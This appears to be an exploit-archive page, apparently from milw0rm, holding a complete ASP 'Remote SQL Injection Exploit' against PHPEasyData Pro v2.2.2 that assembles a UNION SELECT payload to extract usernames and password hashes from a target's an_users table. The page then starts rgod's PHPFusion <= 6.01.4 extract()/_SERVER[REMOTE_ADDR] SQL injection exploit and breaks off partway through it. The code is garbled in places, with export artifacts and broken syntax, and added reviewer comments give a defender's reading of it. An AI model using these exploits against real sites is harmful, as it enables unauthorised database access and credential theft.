008000">
<center>
<font face="Verdana" size="2" color="#008000"><b><a href="exploit3.asp"
>PHPEasyData Pro </b>v2.2.2 (index.php) <u><b>
Remote SQL Injection Exploit</b></u></a></font><br><br>
<table border="1" cellpadding="0" cellspacing="0"
style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808 080" bordercolordark="#008000" bordercolor="#808080">
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style background='#808080';" onmouseout="javascript:this.style.background='#80 8000';">
<font face="Arial" size="1"><b><font color="#FFFFFF">TARGET:</fon t>Example:[http://x.com/path]</b></font><p>
<b><font face="Arial" size="1" color="#FFFFFF">USER ID:</font></b>
<font face="Arial" size="1"><b>Example:[User
ID=1]</b></font></td>
<td width="50%"><center>
<form method="post" name="form1" action="exploit3.asp?islem=get">
<input type="text" name="text1" value="http://" size="25" style="backgroun
d-color: #808080"><br><input type="text" name="id" value="5" size="25" styl e="background-color: #808080">
<input type="submit" value="Get"></center></td>
</tr>
</table>
<div id=htmlAlani></div>
<%
' Page-mode switch: `islem` is read from the query string and selects which
' message (or action) this page produces on the current request.
islem = Request.QueryString("islem")
' hata1: reached via the redirect issued when the target field was submitted empty.
If islem = "hata1" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">Th ere is a problem! Please complete to the whole spaces</font>"
End If
' hata2: reached via the redirect issued when the submitted target text already contains "union".
If islem = "hata2" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">Th ere is a problem! Please right character use</font>"
' NOTE(review): "Trang 2" on the next line looks like a page marker left by the document export, not script text.
Trang 2End If
' hata3: reached via the redirect issued when the submitted target text lacks "http://".
If islem = "hata3" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">Th ere is a problem! Add ""http://""</font>"
End If
%>
<%
' Form handler: runs when the form above posts back with islem=get.
If islem = "get" Then
' string1..string6 are URL-encoded pieces of a single query string for the
' target's index.php. Joined, they put a UNION SELECT into the `cat` parameter
' that asks for user_login and user_pass from the an_users table, filtered on
' user_id.
' Defender view: this can only succeed if index.php places `cat` into its SQL
' text unescaped. Casting `cat` to an integer (it carries a numeric value here)
' or binding it as a query parameter removes the injection point. Requests to
' index.php whose `cat` value contains "union", "select" or "an_users" are the
' access-log signature of this request.
string1="/index.php?cat=-1%20union%20"
string2="select%200,concat(user_login,char(32)"
string3=",user_pass),0,0,"
string4="0%20from%20an_users%"
string5="20where%20user_id%20"
string6="like%20"
' The user id typed into the form is appended as-is; nothing in this page validates it.
string7=Request.Form("id")
' "/*" opens an SQL block comment - presumably to discard the rest of the application's own query.
string8="/*"
targettext = Request.Form("text1")
' Case-insensitive searches (compare mode 1) of the submitted target text.
arama=InStr(1, targettext, "union" ,1)
arama2=InStr(1, targettext, "http://" ,1)
' Empty target -> error page hata1.
If targettext="" Then
Response.Redirect("exploit3.asp?islem=hata1")
Else
' Target text already contains "union" -> error page hata2.
If arama>0 then
Response.Redirect("exploit3.asp?islem=hata2")
Else
' "http://" not found anywhere in the target text -> error page hata3.
' This substring test is the only check made on the URL before it is requested.
If arama2=0 then
Response.Redirect("exploit3.asp?islem=hata3")
Else
%>
<%
' Full request URL: the submitted target followed by the assembled query-string pieces.
target1 = targettext+string1+string2+string3+string4+string5+string6+string7 +string8
' take(come): creates a Microsoft.XMLHTTP object, issues a GET for the URL in
' `come` (third Open argument FALSE = synchronous) and returns the response
' text. The request is made by the server hosting this page, to whatever URL
' the form supplied.
' NOTE(review): the statements inside the With block are reproduced exactly as
' printed in the listing - confirm against an authoritative copy before
' relying on their syntax.
Public Function take(come)
Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
With objtake
Open "GET" , come, FALSE
sEnd
take = Responsetext
End With
SET objtake = Nothing
End Function
' Response body returned for the crafted URL.
get_username = take(target1)
' Position of the literal marker "box-content"> in that body.
getdata=InStr(get_username,"""box-content"">" )
' The 60 characters that follow the marker (the marker itself is 14 characters
' long); this slice is what the page below displays as "Data".
username=Mid(get_username,getdata+14,60)
%>
<center>
<font face="Verdana" size="2" color="#008000"> <u><b>
ajann<br></b></u></font>
<table border="1" cellpadding="0" cellspacing="0"
style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808 080" bordercolordark="#008000" bordercolor="#808080">
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style background='#808080';" onmouseout="javascript:this.style.background='#80 8000';"> &n bsp;
<b><font size="2" face="Arial">Data:</font></b></td>
<td width="80%">
<b><font color="#C0C0C0" size="2" face="Verdana"><%=guvenlik( username)%></b></font></p>
</td>
</tr>
</table>
<form method="POST" name="form2" action="#">
<input type="hidden" name="field1" size="20" value="<%=username%>">< /p>
</form>
</center>
<script language="JavaScript">
write()
functionControl1()
</script>
</body>
</html>
<%
' Close the four nested If blocks opened by the form handler: the islem="get"
' test and the three checks on the submitted target text.
End If
End If
End If
End If
' Release the object reference at page scope.
Set objtake = Nothing
%>
# milw0rm.com [2006-10-29]
sexyvirus(HCE)
PHPFusion <= 6.01.4 sql injection exploit
Code:
#!/usr/bin/php -q -d short_open_tag=on
<?
print_r('
-
PHPFusion <= 6.01.4 extract()/_SERVER[REMOTE_ADDR] sql injection exploit
by rgod rgod@autistici.org
site: http://retrogod.altervista.org
-
');
/*
works with
register globals = *Off*
magic_quotes_gpc = Off
explanation:
vulnerable code in maincore.php at lines 15-21:
if (ini_get('register_globals') != 1) {
$supers =
array("_REQUEST","_ENV","_SERVER","_POST","_GET","_COOKIE","_SESSION","_FILES","_GLOBALS");
foreach ($supers as $ s) {
if ((isset($$ s) == true) && (is_array($$ s) == true)) extract($$ s, EXTR_OVERWRITE);
}
unset($supers);
}
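the extract() function can sometimes be a security hazard: called with EXTR_OVERWRITE on
request-controlled arrays, as here, it lets a request overwrite entries of arrays such as
_SERVER[] and launch an SQL injection attack, e.g.:
http://[target]/[path]/news.php?_SERVER[REMOTE_ADDR]='[SQL]
other attacks may be possible. The overwritten value presumably reaches a query unescaped;
not running extract() over request data, and escaping or binding values taken from _SERVER
before they are used in SQL, removes the issue.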
*/
if ($argc<3) {